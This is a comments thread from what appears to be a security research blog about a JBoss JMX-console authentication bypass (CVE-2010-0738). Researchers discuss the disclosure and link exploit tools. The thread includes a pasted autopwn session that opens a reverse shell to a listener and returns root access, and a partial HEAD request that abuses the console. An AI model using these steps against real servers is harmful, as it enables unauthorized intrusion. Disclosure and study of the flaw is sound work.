tag:blogger.com,1999:blog-7122745763234660283.post1907507360004730740..comments2024-02-18T02:36:33.709-08:00Comments on IMQ Minded Security Blog: Good Bye Critical Jboss 0dayMinded Securityhttp://www.blogger.com/profile/01503616812076743415noreply@blogger.comBlogger13125tag:blogger.com,1999:blog-7122745763234660283.post-68618432641372841352012-09-26T01:56:23.565-07:002012-09-26T01:56:23.565-07:00@Anonymous Thank you very much for that, that'...@Anonymous Thank you very much for that, that's one of the most comprehensive research about Jboss exploitation analysis.Giorgio Fedonhttps://www.blogger.com/profile/10261243238330266276noreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-52576549065051572482012-09-21T15:07:42.672-07:002012-09-21T15:07:42.672-07:00www.matasano.com/research/OWASP3011_Luca.pdf Preso...www.matasano.com/research/OWASP3011_Luca.pdf Preso containing CVE-2010-0738 and other useful details on hacking JBoss Anonymousnoreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-86799262189736825122011-10-21T05:16:30.410-07:002011-10-21T05:16:30.410-07:00The verb tampering security issue in the JMX conso...The verb tampering security issue in the JMX console has been ported also to BeEF many months ago (presented at CONFidence May 2011)<br /><br />http://antisnatchor.com/JBoss_JMX_Deploy_Exploit<br /><br />Cheers<br />Micheleantisnatchorhttp://antisnatchor.comnoreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-5329635631896185092010-05-11T17:02:09.597-07:002010-05-11T17:02:09.597-07:00A metasploit module now exist to abuse the issue a...A metasploit module now exist to abuse the issue as well.<br /><br />http://www.metasploit.com/redmine/projects/framework/repository/revisions/9285/entry/modules/exploits/multi/http/jboss_deploymentfilerepository.rbmcnoreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-52328321483054389552010-05-10T14:07:39.092-07:002010-05-10T14:07:39.092-07:00Guys, I have been trying to reproduce this vulnera...Guys, I have been trying to reproduce this vulnerability in version 4.0.4 and I haven't had much luck!!! :( Any ideas...???Billnoreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-77425838098242574762010-05-10T00:55:34.271-07:002010-05-10T00:55:34.271-07:00@Dennis You should ask to the author (Christian Pa...@Dennis You should ask to the author (Christian Papathanasiou), we don't know when he'll release it.Minded Securityhttps://www.blogger.com/profile/01503616812076743415noreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-16073345385163402182010-05-06T02:53:22.785-07:002010-05-06T02:53:22.785-07:00is it possible to get a version of jboss-autopwn? ...is it possible to get a version of jboss-autopwn? want to test our jboss serversDennishttps://www.blogger.com/profile/16662125793528221113noreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-85083945181444162592010-05-03T07:37:15.181-07:002010-05-03T07:37:15.181-07:00@Chris: Very happy to see this new addition to jbo...@Chris: Very happy to see this new addition to jboss-autopwn! :D<br /><br />@Frank: We have developed a custom exploit that redirects temporarily the output to Jboss status page, which is not password protected by default. This issue has been fixed with "CVE-2010-1429". During the next few days we will publish it on our website, along with the official advisory.Giorgio Fedonhttps://www.blogger.com/profile/10261243238330266276noreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-3241994351337851272010-05-03T05:58:12.003-07:002010-05-03T05:58:12.003-07:00Got this working with JBoss-autopwn :-D
Screensho...Got this working with JBoss-autopwn :-D<br /><br />Screenshot below..<br /><br />[root@foo jboss-autopwn]# ./jboss-autopwn 192.168.1.3 8080<br />[x] Checking if authentication is enabled..<br />[!] Authentication enabled!<br />[x] Proceeding to use CVE-2010-0738 JBoss /jmx-console authentication bypass<br />[!] Is this a *nix based or Windows based JBoss instance? nix<br />[!] Which IP should I send the reverse shell to? 192.168.1.2<br />[!] Which port should I send the reverse shell to? 6669<br />[x] *nix based selected...<br />Connection from 192.168.1.3 port 6669 [tcp/*] accepted<br />[!] you should now have a shell on 192.168.1.2:6669<br />[root@foo jboss-autopwn]# fg 1<br />nc -lv 6669<br />id<br />uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)<br />uname -a<br />Linux nitrogen 2.6.29.6-213.fc11.x86_64 #1 SMP Tue Jul 7 21:02:57 EDT 2009 x86_64 x86_64 x86_64 GNU/Linux<br />^C<br />[root@foo jboss-autopwn]# <br /><br />Will be testing it some more and sending you guys a copy soon :-)<br /><br />Christian Papathanasiou.Chrishttps://www.blogger.com/profile/01526348108211940855noreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-43543333604337229872010-04-30T23:55:15.022-07:002010-04-30T23:55:15.022-07:00It works. Anyway I cannot get response output, sin...It works. Anyway I cannot get response output, since HEAD method is without response body.<br /><br />Do you have any hint for issue a command to download JMX-Console configuration files?<br /><br />Thank youFrank D.http://www.securityfocus.comnoreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-22946932748799850842010-04-30T07:42:14.224-07:002010-04-30T07:42:14.224-07:00@Steve Thank you!
@Frank
just supply the request...@Steve Thank you!<br /><br />@Frank<br /><br />just supply the request like this:<br /><br />HEAD<br />/jmx-console/HtmlAdaptor?action=invokeOpByName&name=jboss.deployer%3Aserv....<br />HTTP/1.1<br /><br />Use GET parameters, not POST ;D should workGiorgio Fedonhttps://www.blogger.com/profile/10261243238330266276noreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-12229871286443480272010-04-30T07:39:29.945-07:002010-04-30T07:39:29.945-07:00Hi guys.
We are trying to test the exploit but it...Hi guys.<br /><br />We are trying to test the exploit but it doesn't work; any other hint?Frank D.http://www.securityfocus.comnoreply@blogger.comtag:blogger.com,1999:blog-7122745763234660283.post-22301171688273256362010-04-30T07:37:37.488-07:002010-04-30T07:37:37.488-07:00Awesome work Guys!
SteveAwesome work Guys!<br /><br />SteveAnonymousnoreply@blogger.com